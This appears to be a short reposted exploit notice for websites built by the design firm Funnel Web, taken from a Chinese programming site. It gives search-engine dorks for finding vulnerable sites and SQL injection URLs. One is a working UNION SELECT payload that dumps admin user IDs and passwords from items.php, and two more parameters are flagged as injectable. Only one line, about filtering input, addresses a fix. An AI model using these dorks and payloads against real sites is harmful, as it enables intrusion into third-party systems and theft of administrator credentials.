AuTh0r : Ehsan_Hp200
## Vendor : http://www.funnel-web.com.au/
## Persian Gulf 4 Ever!
Dork : "Web site design by Funnel Web" "inurl:items.php"
Exploite:
www.2cto.com /items.php?&cat_id=-1+Union+Select+1,concat(user_id,0x3a,u
ser_pw),1+From+admin--
Dork : "Web site design by Funnel Web" "inurl:directory.php?cid="
Exploite:
www.2cto.com /directory.php?cid=[SQL]
Dork : "Web site design by Funnel Web" "inurl:selected_product.php?t="
Exploite:
www.2cto.com /selected_product.php?t=[SQL]
修复:过滤相应页面参数输入
SpeCial TanX To : Dj7Xpl
查看更多关于Funnel Web多个页面注入缺陷及修复 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11688